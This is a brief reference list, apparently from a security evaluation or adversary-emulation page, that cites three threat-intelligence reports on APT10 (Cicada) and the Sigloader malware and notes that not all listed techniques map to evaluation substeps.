- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
:link: Click to expand source code links table
ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps